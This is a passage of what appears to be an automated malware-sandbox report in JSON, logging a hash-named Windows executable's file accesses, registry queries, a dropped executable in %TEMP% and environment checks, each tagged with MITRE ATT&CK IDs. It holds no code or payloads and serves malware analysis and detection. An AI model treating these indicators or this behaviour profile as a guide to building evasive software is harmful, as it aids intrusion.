\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"3233335BF847967E7FF2B37308A90CEB4C4465F19F113DDDB17243C91F4D078F\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002900)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" queries volume information of \"C:\\\" at 00000000-00002920-0000010C-1576724\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002900-0000010C-227186\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002956-0000010C-595194", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" queries volume information of \"C:\\\" at 00000000-00002920-0000010C-1576724\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002900-0000010C-227186\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002956-0000010C-595194", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000750000967500fb957500000000000000000000007200000000019cdd22000000000000eb220095e18c778e7c1400feffffff435c907750599077aa000000b8000000fa957500f895750024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c8f7760d88b75ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed907722967500a06a66758600000024df22005ce322000000000086008800a06a667524df2200916c667522967500a06a6675a06a667594e3220002020000 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002920)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006d00605e6d005b5e6d00000000000000000000006a00000000019cdc22000000000000ea220095e18c7748641400feffffff435c907750599077aa000000b80000005a5e6d00585e6d0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c8f7760d88b75ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed9077825e6d00a06a66758600000024de22005ce222000000000086008800a06a667524de2200916c6675825e6d00a06a6675a06a667594e2220002020000 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf009177d6009177d483a67770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002956)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002900)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002900)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002920)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n 